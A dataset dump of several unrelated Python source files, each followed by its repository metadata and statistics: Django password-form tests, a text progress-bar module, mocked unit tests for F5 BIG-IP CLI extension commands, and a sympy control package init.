html = form.as_div()
self.assertIn(
"Enter your new password",
html
)
def test_org_html_state(self):
form = PasswordChangeForm(self.org_user)
html = form.as_div()
self.assertIn(
"Enter your new password",
html
)
def test_user_password_validation(self):
# Test both required
form = PasswordChangeForm(self.user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "password",
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["This field is required."],
})
# Test both must match
form = PasswordChangeForm(self.user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "password",
"new_password2": "password2"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["The two password fields don't match. Please try again."],
})
# Test min length
form = PasswordChangeForm(self.user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "123",
"new_password2": "123"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"Eeek - that password is too short! "
"Please create a password that has at least 8 characters and is a combination of letters and numbers."
]
})
def test_org_user_password_validation(self):
# Test both required
form = PasswordChangeForm(self.org_user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "password",
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["This field is required."],
})
# Test both must match
form = PasswordChangeForm(self.org_user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "password",
"new_password2": "password2"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["The two password fields don't match. Please try again."],
})
# Test min length, unique validation and contains more than numeric
form = PasswordChangeForm(self.org_user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "123",
"new_password2": "123"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"This password is too short. It must contain at least 8 characters.",
"This password is entirely numeric.",
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test unique validation
form = PasswordChangeForm(self.org_user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "asdasdasd",
"new_password2": "asdasdasd"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test close to username
form = PasswordChangeForm(self.org_user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "forgotmypass",
"new_password2": "forgotmypass"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"The password is too similar to the username.",
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test success
form = PasswordChangeForm(self.org_user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "asdasdasdA@1",
"new_password2": "asdasdasdA@1"
})
self.assertTrue(form.is_valid())
class TestRequiredDecorator(TestCase):
maxDiff = None
def test_registration(self):
form = RegistrationForm()
html = form.as_div()
for name, field in form.fields.items():
# Terms is not rendered as part of the form html method
if field.required and name is not "terms":
self.assertIn("*", field.label)
self.assertIn(
field.label,
html
)
def test_edit_profile(self):
user = get_user_model().objects.create_user(
username="requiredlabeluser",
email="awesome@email.com",
password="Awesome!234",
birth_date=datetime.date(2001, 1, 1)
)
form = EditProfileForm(instance=user)
html = form.as_div()
for name, field in form.fields.items():
if field.required:
self.assertIn("*", field.label)
self.assertIn(field.label, html)
def test_user_migration(self):
form = UserDataForm()
html = form.as_div()
for name, field in form.fields.items():
if field.required:
self.assertIn("*", field.label)
self.assertIn(field.label, html)
| 36.300408
| 120
| 0.543402
| 4,456
| 44,468
| 5.293761
| 0.074955
| 0.022256
| 0.030777
| 0.0443
| 0.882276
| 0.873161
| 0.864344
| 0.848828
| 0.819238
| 0.794226
| 0
| 0.023851
| 0.330575
| 44,468
| 1,224
| 121
| 36.330065
| 0.768577
| 0.036453
| 0
| 0.822535
| 0
| 0
| 0.284983
| 0.010867
| 0
| 0
| 0
| 0.000817
| 0.128639
| 1
| 0.040376
| false
| 0.198122
| 0.00939
| 0
| 0.064789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
935fb354e6879be24cacfbc4b45f540a03ad4c40
| 1,809
|
py
|
Python
|
StringProgressBar/__init__.py
|
MrJacob12/StringProgressBar
|
12b7a3f5170edf007aabbd9cc985200250bdd904
|
[
"MIT"
] | 2
|
2021-09-27T05:42:38.000Z
|
2022-03-04T04:49:38.000Z
|
StringProgressBar/__init__.py
|
Sparker-99/StringProgressBar
|
12b7a3f5170edf007aabbd9cc985200250bdd904
|
[
"MIT"
] | null | null | null |
StringProgressBar/__init__.py
|
Sparker-99/StringProgressBar
|
12b7a3f5170edf007aabbd9cc985200250bdd904
|
[
"MIT"
] | 3
|
2021-09-26T13:54:23.000Z
|
2021-09-26T14:49:17.000Z
|
class progressBar():
def splitBar(total, current, size=40, line='▬', slider='🔘'):
if not isinstance(total, int):
raise ValueError('Total value is not an integer')
if not isinstance(current, int):
raise ValueError('Current value is not an integer')
if not isinstance(size, int):
raise ValueError('Size is not an integer')
if current > total:
bar = line * size
percentage = (current / total) * 100
return [bar, percentage]
else:
percentage = current / total
progress = round(size * percentage)
emptyProgress = size - progress
progressText = (line * progress)[:-1] + slider
emptyProgressText = line * emptyProgress
bar = progressText + emptyProgressText
calculated = percentage * 100
return [bar, calculated]
def filledBar(total, current, size=40, line='□', slider='■'):
if not isinstance(total, int):
raise ValueError('Total value is not an integer')
if not isinstance(current, int):
raise ValueError('Current value is not an integer')
if not isinstance(size, int):
raise ValueError('Size is not an integer')
if current > total:
bar = slider * size
percentage = (current / total) * 100
return [bar, percentage]
else:
percentage = current / total
progress = round(size * percentage)
emptyProgress = size - progress
progressText = slider * progress
emptyProgressText = line * emptyProgress
bar = progressText + emptyProgressText
calculated = percentage * 100
return [bar, calculated]
| 38.489362
| 65
| 0.569375
| 178
| 1,809
| 5.808989
| 0.207865
| 0.029014
| 0.087041
| 0.081238
| 0.905222
| 0.862669
| 0.862669
| 0.862669
| 0.862669
| 0.862669
| 0
| 0.014358
| 0.345495
| 1,809
| 46
| 66
| 39.326087
| 0.855574
| 0
| 0
| 0.829268
| 0
| 0
| 0.092869
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0
| 0
| 0
| 0.170732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9360ed038c41558f1c1146a2e665c9fec63eeeba
| 35,284
|
py
|
Python
|
tests/unittests/commands/test_cmd_bigip.py
|
f5devcentral/f5-cli
|
22a5c6902e3f78a969a86116a73fcad817f220be
|
[
"Apache-2.0"
] | 13
|
2020-03-06T22:35:47.000Z
|
2021-06-28T23:08:46.000Z
|
tests/unittests/commands/test_cmd_bigip.py
|
f5devcentral/f5-cli
|
22a5c6902e3f78a969a86116a73fcad817f220be
|
[
"Apache-2.0"
] | 19
|
2020-03-11T15:14:06.000Z
|
2022-01-26T23:56:56.000Z
|
tests/unittests/commands/test_cmd_bigip.py
|
f5devcentral/f5-cli
|
22a5c6902e3f78a969a86116a73fcad817f220be
|
[
"Apache-2.0"
] | 1
|
2020-03-24T13:29:30.000Z
|
2020-03-24T13:29:30.000Z
|
""" Test BIG-IP command """
import json
from f5sdk.bigip import ManagementClient
from f5cli.config import AuthConfigurationClient
from f5cli.commands.cmd_bigip import cli
from ...global_test_imports import MagicMock, call, PropertyMock, pytest, CliRunner
MOCK_CONFIG_CLIENT_READ_AUTH_RETURN_VALUE = {
'host': '1.2.3.4',
'port': '1234',
'type': 'BIGIP',
'user': 'test_user',
'password': 'test_password'
}
MOCK_IS_INSTALLED_RETURN_VALUE = {
'installed': True,
'installed_version': '1.10.0',
'latest_version': '1.10.0'
}
# pylint: disable=too-many-public-methods
class TestCommandBigIp(object):
""" Test Class: command bigip """
@classmethod
def setup_class(cls):
""" Setup func """
cls.runner = CliRunner()
@classmethod
def teardown_class(cls):
""" Teardown func """
@staticmethod
@pytest.fixture
def do_extension_client_fixture(mocker):
"""Test fixture """
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = MOCK_IS_INSTALLED_RETURN_VALUE
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
return mock_extension_client
@staticmethod
@pytest.fixture
def as3_extension_client_fixture(mocker):
"""Test fixture """
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.AS3Client")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True
}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
return mock_extension_client
@staticmethod
@pytest.fixture
def cf_extension_client_fixture(mocker):
"""Test fixture """
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.CFClient")
mock = MagicMock()
mock.is_installed.return_value = MOCK_IS_INSTALLED_RETURN_VALUE
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
return mock_extension_client
@staticmethod
@pytest.fixture
def config_client_read_auth_fixture(mocker):
""" PyTest fixture mocking AuthConfigurationClient's read_auth method """
mock_config_client_read_auth = mocker.patch.object(
AuthConfigurationClient, "read_auth")
mock_config_client_read_auth.return_value = MOCK_CONFIG_CLIENT_READ_AUTH_RETURN_VALUE
@staticmethod
@pytest.fixture
def config_client_fixture(mocker):
""" PyTest fixture returning mocked AuthConfigurationClient """
mock_config_client = mocker.patch.object(AuthConfigurationClient, "__init__")
mock_config_client.return_value = None
return mock_config_client
@staticmethod
@pytest.fixture
def mgmt_client_fixture(mocker):
""" PyTest fixture returning mocked BigIP Management Client """
mock_management_client = mocker.patch.object(ManagementClient, '__init__')
mock_management_client.return_value = None
return mock_management_client
# pylint: disable=unused-argument
def test_cmd_package_verify_existing_extension_component(self,
mocker,
mgmt_client_fixture,
config_client_read_auth_fixture):
""" Command package verify an existing extension component
Given
- BIG-IP is up
- 'do' extension component is installed
When
- User attempts to verify status of the install 'do' extension component
Then
- Installed version information 'do' extension component is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = MOCK_IS_INSTALLED_RETURN_VALUE
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'verify', '--version', '1.10.0'])
assert result.output == json.dumps(
MOCK_IS_INSTALLED_RETURN_VALUE,
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_verify_nonexist_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package verify a non-existing package
Given
- BIG-IP is up
- 'do' component is not installed
When
- User attempts to verify status of the install 'do' component
Then
- Installed version information 'do' extension component is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock_is_installed_return_value = {
'installed': False,
'installed_version': '',
'latest_version': '1.10.0'
}
mock = MagicMock()
mock.is_installed.return_value = mock_is_installed_return_value
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'verify', '--version', '1.10.0'])
assert result.output == json.dumps(
mock_is_installed_return_value, indent=4, sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_install_existing_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package install an existing package
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to install 'do' component
Then
- Already installed 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.10.0',
'latest_version': '1.10.0'
}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'install', '--version', '1.10.0'])
assert result.output == json.dumps(
{"message": "Extension component package 'do' version '1.10.0' is already installed"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_install_non_existing_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package install a non-existing package
Given
- BIG-IP is up
- 'do' component is not installed
When
- User attempts to install 'do' component
Then
- Successfully installed 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': False,
'installed_version': '',
'latest_version': '1.10.0'
}
mock.install.return_value = {'version': '1.10.0'}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'install', '--version', '1.10.0'])
assert result.output == json.dumps(
{"message": "Extension component package 'do' successfully installed version '1.10.0'"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_uninstall_existing_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package uninstall an existing package
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to uninstall 'do' component
Then
- Uninstalled 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.10.0',
}
mock.uninstall.return_value = None
type(mock_extension_client.return_value).package = PropertyMock(
return_value=mock
)
result = self.runner.invoke(
cli, ['extension', 'do', 'uninstall', '--version', '1.10.0', '--auto-approve'])
assert result.output == json.dumps(
{
"message": "Extension component package 'do' successfully uninstalled"
},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_uninstall_non_existing_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package uninstall a non-existing package
Given
- BIG-IP is up
- 'do' component is not installed
When
- User attempts to uninstall 'do' component
Then
- Already uninstalled 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': False,
'installed_version': ''
}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'uninstall', '--version', '1.10.0', '--auto-approve'])
assert result.output == json.dumps(
{"message": "Extension component package 'do' is already uninstalled"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_install_optional_package_url_https(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
as3_extension_client_fixture):
""" Command package install optional package-url https
Given
- BIG-IP is up
- 'as3' component is not installed
When
- User attempts to install package 'as3' --package-url with https:// specify
Then
- Successfully installed 'as3' component message is logged
"""
mock_package = MagicMock()
mock_package.is_installed.return_value = {
'installed': False
}
mock_response = {
"message": "Extension component package 'as3' successfully installed version '3.17.1'"
}
remote_rpm = 'https://myhost/f5-appsvcs-3.17.1-1.noarch.rpm'
mock_package.install(package_url=remote_rpm)
mock_package.install.return_value = {'version': '3.17.1'}
mock_extension_client = as3_extension_client_fixture
type(mock_extension_client.return_value).package = PropertyMock(
return_value=mock_package)
result = self.runner.invoke(cli, ['extension', 'as3', 'install', '--package-url',
remote_rpm])
assert result.output == json.dumps(mock_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_install_optional_package_url_file(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
as3_extension_client_fixture):
""" Command package install optional package-url file
Given
- BIG-IP is up
- 'as3' component is not installed
When
- User attempts to install package 'as3' --package-url with file:// specify
Then
- Successfully installed 'as3' component message is logged
"""
mock_package = MagicMock()
mock_package.is_installed.return_value = {
'installed': False
}
mock_response = {
"message": "Extension component package 'as3' successfully installed version '3.17.1'"
}
local_rpm = 'file:///downloads/f5-appsvcs-3.17.1-1.noarch.rpm'
mock_package.install(package_url=local_rpm)
mock_package.install.return_value = {'version': '3.17.1'}
mock_extension_client = as3_extension_client_fixture
type(mock_extension_client.return_value).package = PropertyMock(
return_value=mock_package)
result = self.runner.invoke(cli, ['extension', 'as3', 'install', '--package-url',
local_rpm])
assert result.output == json.dumps(mock_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_upgrade_existing_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package upgrade to a latest version
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to upgrade 'do' component
Then
- Upgraded 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.8.0',
'latest_version': '1.10.0'
}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': False,
'installed_version': ''
}
mock.uninstall.return_value = None
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.8.0',
'latest_version': '1.10.0'
}
mock.install.return_value = None
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'upgrade'])
assert result.output == json.dumps(
{"message": "Successfully upgraded extension component package 'do' to "
"version '1.10.0'"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_upgrade_existing_extension_component_ver(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package upgrade to a specific version
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to upgrade 'do' component --version 1.9.0
Then
- Upgraded 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.8.0',
'latest_version': '1.10.0'
}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': False,
'installed_version': ''
}
mock.uninstall.return_value = None
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.9.0',
'latest_version': '1.10.0'
}
mock.install.return_value = None
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'upgrade', '--version', '1.9.0'])
assert result.exit_code == 0, result.exception
assert result.output == json.dumps(
{"message": "Successfully upgraded extension component package 'do' to "
"version '1.9.0'"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_upgrade_installed_vers_equals_latest_vers(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package upgrade to a version already latest
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to upgrade to a version already installed
Then
- Upgraded 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.10.0',
'latest_version': '1.10.0'
}
type(mock_extension_client.return_value).package = PropertyMock(
return_value=mock
)
result = self.runner.invoke(
cli, ['extension', 'do', 'upgrade'])
assert result.output == json.dumps(
{"message": "Extension component package 'do' version '1.10.0' "
"is already installed"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_upgrade_uninstalled_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package upgrade uninstalled extension component
Given
- BIG-IP is up
- 'do' component is not installed
When
- User attempts to upgrade 'do' component
Then
- Already uninstalled 'do', re-run install message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': False,
'installed_version': '',
'latest_version': '1.10.0'
}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'upgrade'])
assert result.output == json.dumps(
{"message": "Extension component package 'do' is uninstalled, re-run install command"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_show_installed_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
do_extension_client_fixture):
""" Command service show an already installed component
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to show the status of 'do' component
Then
- Current status message of 'do' component is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
show_response = {
'foo': 'bar'
}
mock_service = MagicMock()
mock_service.show.return_value = show_response
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(
cli, ['extension', 'do', 'show', '--version', '1.3.0'])
assert result.output == json.dumps(show_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_show_non_installed_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command service show status of a non-installed component
Given
- BIG-IP is up
- 'do' component is not installed
When
- User attempts to show the status of 'do' component
Then
- 'do' component is installed
- 'do' component is available
- Current status message of 'do' component is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient"
)
is_installed_response = {
'installed': False
}
show_response = {
'foo': 'bar'
}
mock_package = MagicMock()
mock_package.is_installed.return_value = is_installed_response
mock_package.install.return_value = None
type(mock_extension_client.return_value).package = PropertyMock(
return_value=mock_package)
mock_service = MagicMock()
mock_service.show.return_value = show_response
mock_service.is_available.return_value = None
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(
cli,
['extension', 'do', 'show', '--version', '1.3.0']
)
assert result.exit_code == 0, result.exception
assert result.output == json.dumps(show_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_list_versions_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package list-versions
Given
- BIG-IP is up
When
- User attempts to list available package versions of 'do'
Then
- all available packages will be listed
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient"
)
list_response = [
'foo',
'bar'
]
mock_package = MagicMock()
mock_package.list_versions.return_value = list_response
type(mock_extension_client.return_value).package = PropertyMock(
return_value=mock_package)
result = self.runner.invoke(
cli,
['extension', 'do', 'list-versions']
)
assert result.output == json.dumps(list_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_create_declaration_non_installed_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
as3_extension_client_fixture):
""" Command service create declaration of an installed component
Given
- BIG-IP is up
- 'as3' component is not installed
When
- User attempts to create a 'as3' declaration
Then
- result status of create action is logged
"""
mock_package = MagicMock()
mock_package.is_installed.return_value = {
'installed': False
}
mock_service = MagicMock()
create_response = {
'foo': 'bar'
}
mock_service.create.return_value = create_response
mock_extension_client = as3_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
mock_utils_core_convert = mocker.patch(
"f5cli.utils.core.convert_to_absolute")
mock_utils_core_convert.return_value = "fake location"
result = self.runner.invoke(cli, ['extension', 'as3', 'create',
'--declaration', './test/fake_declaration.json'])
assert result.output == json.dumps(create_response, indent=4, sort_keys=True) + '\n'
mock_utils_core_convert.assert_has_calls(
[call('./test/fake_declaration.json')])
# pylint: disable=unused-argument
def test_cmd_service_create_declaration_installed_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
do_extension_client_fixture):
""" Command service create declaration of an installed component
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to create a 'do' declaration
Then
- result status of create action is logged
"""
mock_service = MagicMock()
create_response = {
'foo': 'bar'
}
mock_service.create.return_value = create_response
mock_extension_client = do_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
mock_utils_core_convert = mocker.patch(
"f5cli.utils.core.convert_to_absolute")
mock_utils_core_convert.return_value = "fake location"
result = self.runner.invoke(cli, ['extension', 'do', 'create',
'--declaration', './test/fake_declaration.json'])
assert result.output == json.dumps(create_response, indent=4, sort_keys=True) + '\n'
mock_utils_core_convert.assert_has_calls(
[call('./test/fake_declaration.json')])
# pylint: disable=unused-argument
def test_cmd_service_show_failover_cf_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
cf_extension_client_fixture):
""" Command service show failover (/GET trigger) from CF extension
Given
- 'cf' component is installed
When
- User attempts to show-failover
Then
- result status of show-failover
"""
mock_service = MagicMock()
show_failover_response = {
'foo': 'bar'
}
mock_service.show_trigger.return_value = show_failover_response
mock_extension_client = cf_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(cli, ['extension', 'cf', 'show-failover'])
assert result.output == json.dumps(show_failover_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_show_info_cf_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
cf_extension_client_fixture):
""" Command service show-info of CF extension component
Given
- BIG-IP is up
- 'cf' component is installed
When
- User attempts to show-info
Then
- result status of show-info
"""
mock_service = MagicMock()
show_info_response = {
'foo': 'bar'
}
mock_service.show_info.return_value = show_info_response
mock_extension_client = cf_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(cli, ['extension', 'cf', 'show-info'])
assert result.output == json.dumps(show_info_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_show_inspect_cf_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
cf_extension_client_fixture):
""" Command service show-inspect of CF extension component
Given
- BIG-IP is up
- 'cf' component is installed
When
- User attempts to show-inspect
Then
- result status of show-inspect
"""
mock_service = MagicMock()
show_inspect_response = {
'foo': 'bar'
}
mock_service.show_inspect.return_value = show_inspect_response
mock_extension_client = cf_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(cli, ['extension', 'cf', 'show-inspect'])
assert result.output == json.dumps(show_inspect_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_reset_cf_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
cf_extension_client_fixture):
""" Command service reset of CF extension component
Given
- BIG-IP is up
- 'cf' component is installed
When
- User attempts to reset
Then
- result status of reset
"""
mock_service = MagicMock()
reset_response = {
'foo': 'bar'
}
mock_service.reset.return_value = reset_response
mock_extension_client = cf_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(cli, ['extension', 'cf', 'reset', '--auto-approve'])
assert result.output == json.dumps(reset_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_trigger_cf_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
cf_extension_client_fixture):
""" Command service trigger failover of CF extension component
Given
- BIG-IP is up
- 'cf' component is installed
When
- User attempts to trigger
Then
- result status of trigger
"""
mock_service = MagicMock()
trigger_response = {
'foo': 'bar'
}
mock_service.trigger.return_value = trigger_response
mock_extension_client = cf_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(cli, ['extension', 'cf', 'trigger-failover'])
assert result.output == json.dumps(trigger_response, indent=4, sort_keys=True) + '\n'
def test_cmd_service_unsupported_action(self):
""" Unsupported command service action
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to perform 'remove' action on 'do' component
Then
- Non-implemented action exception is thrown
"""
result = self.runner.invoke(
cli, ['extension', 'as3', 'remove'])
assert "invalid choice: remove" in result.output
assert result.exception
| 39.600449
| 100
| 0.553282
| 3,411
| 35,284
| 5.470537
| 0.055995
| 0.068382
| 0.06313
| 0.036977
| 0.885906
| 0.863344
| 0.84298
| 0.824652
| 0.819185
| 0.797053
| 0
| 0.010427
| 0.363961
| 35,284
| 890
| 101
| 39.644944
| 0.82105
| 0.166676
| 0
| 0.711152
| 0
| 0
| 0.116649
| 0.030083
| 0
| 0
| 0
| 0
| 0.051188
| 1
| 0.056673
| false
| 0.001828
| 0.009141
| 0
| 0.076782
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
faa8400da404c4c8e7769efe3df130cab96d1260
| 178
|
py
|
Python
|
sympy/physics/control/__init__.py
|
joha2/sympy
|
5c54e5b78bc907569f56996601603b7b574dfc73
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/physics/control/__init__.py
|
joha2/sympy
|
5c54e5b78bc907569f56996601603b7b574dfc73
|
[
"BSD-3-Clause"
] | 10
|
2021-07-21T20:56:57.000Z
|
2021-07-31T16:35:28.000Z
|
sympy/physics/control/__init__.py
|
joha2/sympy
|
5c54e5b78bc907569f56996601603b7b574dfc73
|
[
"BSD-3-Clause"
] | null | null | null |
from .lti import TransferFunction, Series, Parallel, Feedback, TransferFunctionMatrix
__all__ = ['TransferFunction', 'Series', 'Parallel', 'Feedback', 'TransferFunctionMatrix']
| 44.5
| 90
| 0.786517
| 14
| 178
| 9.714286
